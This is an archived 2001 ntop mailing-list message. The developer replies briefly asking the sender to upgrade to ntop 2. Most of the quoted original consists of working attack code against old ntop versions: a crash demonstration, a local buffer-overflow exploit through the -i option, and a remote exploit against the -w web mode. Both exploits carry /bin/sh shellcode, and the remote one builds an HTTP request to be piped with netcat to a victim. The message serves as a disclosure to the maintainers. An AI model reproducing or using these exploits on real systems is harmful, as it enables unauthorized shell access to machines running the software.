Re: [Ntop] ntop hack:((((((((((((((

Thu, 11 Oct 2001 00:55:47 -0700 

Alexei,
please move to ntop 2.

Thanks, Luca

----- Original Message -----
From: <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>; <[EMAIL PROTECTED]>;
<[EMAIL PROTECTED]>
Sent: Thursday, October 11, 2001 9:31 AM
Subject: [Ntop] ntop hack:((((((((((((((


> Hi,
> Look at that!!!
>
> Source
>
http://www.webdoc.ru/text.phtml?level=2&id=98&script_id=237&url=texts/201-30
0/237.html
>
> (in russian, use online translator on altavista.com)
>
> tshaw:/home/cb/ntop-1.3.2$ ./ntop -i `perl -e 'print "A"x2835'`
>
> 24/Oct/2000:12:32:16 ntop v.1.3.2 MT [i686-pc-linux-gnu] (08/11/00
> 07:04:32 PM build)
> 24/Oct/2000:12:32:16 Listening on
> [AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
> 24/Oct/2000:12:32:16 Copyright 1998-2000 by Luca Deri <[EMAIL PROTECTED]>
> 24/Oct/2000:12:32:16 Get the freshest ntop from http://www.ntop.org/
> 24/Oct/2000:12:32:16 Initialising...
> Segmentation fault
> tshaw:/home/cb/ntop-1.3.2$
>
>
> EXPLOIT
> ========
>
> #include <stdlib.h>
> #include <string.h>
> #include <stdio.h>
>
> #define LEN 208
>
> int main (int argc, char **argv)
> {
> char buf[LEN + 12];
> intret = 0xbffffba0;
> int*p;
>
> char code[]=
> "\x31\xdb\xb8\xb7\xaa\xaa\xaa\x25\xb7\x55\x55\x55\x53\x53\xcd\x80"
> "\x31\xdb\xb8\x17\xaa\xaa\xaa\x25\x17\x55\x55\x55\x53\x53\xcd\x80"
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
>
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> if (argc > 1) {
> ret += atoi(argv[1]);
>
> fprintf(stderr, "Using ret %#010x\n", ret);
> }
>
> memset(buf, '\x90', LEN);
> memcpy(buf + LEN - strlen(code), code, strlen(code));
>
> p = (int *) (buf + LEN);
>
> *p++ = ret;
> *p++ = ret;
> *p = 0;
>
>  execl("./ntop", "ntop", "-i", buf, NULL);
>
> }
>
>
> REMOTE EXPLOIT
> =================
>
> #include <stdio.h>
> #include <string.h>
>
>
> char shellcode[] =
> "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
> "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
> "\x80\xe8\xdc\xff\xff\xff/bin/sh";
>
> void usage()
> {
>  printf("NTOP ntop-1.2a1 -w mode command execution exploit.\n");
>  printf(" [EMAIL PROTECTED]\n");
>  printf("Usage : ./ntop-w-exp | nc victim port\n");
>  exit(0);
> }
>
> void main( int argc, char *argv[] )
> {
> int i,offset=-24;
> #define CODE_LEN 240
> #define NOP_LEN 50
> char code_buf[CODE_LEN];
> unsigned long esp=0xbedffb00;
>
> if(argc >= 2) offset = atoi(argv[1]);
>
> memset(code_buf,0x90,NOP_LEN); //insert NOP CODES
> memcpy(code_buf+NOP_LEN, shellcode, strlen(shellcode));
> for(i=strlen(shellcode)+NOP_LEN;i<=CODE_LEN;i+=4)
>  *(long *)&code_buf[i]=(unsigned long)esp-offset;
>
> printf("GET /");
> for(i=0;i<CODE_LEN; i++)
> {
>  putchar(code_buf[i]);
> }
> printf("\r\n\r\n");
> }
>
>
>
> Mit freundlichen Grüßen
>
> Alexei Voronine
>
> dvg Hannover
> OE352 UNIX Server Control Center (USCC)
> e-Mail   [EMAIL PROTECTED]
> Tel:       0511-5102-3703
>
>
> _______________________________________________
> Ntop mailing list
> [EMAIL PROTECTED]
> http://listmanager.unipi.it/mailman/listinfo/ntop
>

_______________________________________________
Ntop mailing list
[EMAIL PROTECTED]
http://listmanager.unipi.it/mailman/listinfo/ntop

Reply via email to